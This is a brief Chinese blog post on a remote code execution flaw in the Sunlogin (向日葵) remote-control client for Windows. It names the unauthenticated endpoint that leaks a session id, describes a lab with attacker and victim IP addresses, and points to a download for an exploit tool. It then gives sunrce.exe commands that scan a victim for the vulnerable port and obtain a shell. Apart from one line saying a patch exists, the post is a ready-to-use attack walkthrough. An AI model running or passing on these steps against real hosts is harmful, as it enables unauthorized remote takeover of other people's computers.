向日葵个人版企业版受影响 for Windows <=11.0.0.33

SunloginClient 启动后会在 40000 上面随机开一个web端口认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce 向日葵客户端漏洞版测试：11.0.0.33826

环境说明

攻击机:192.168.0.23(Window10) 目标机:192.168.0.24(windows2012)  向日葵客户端漏洞版测试：11.0.0.33826   

向日葵漏洞扫描工具下载地址

扫描受害者漏洞端口

sunrce.exe -h 192.168.0.24 -ps -shell 

获取受害机shell

sunrce.exe -h 192.168.0.24 -ps 49341 -shell 

制造商已发布漏洞修复程序，请及时注意更新

原创并不容易。请注明转载的来源 原文链接：https://qu1u1.cn/archives/向日葵远程控制远程代码执行漏洞工具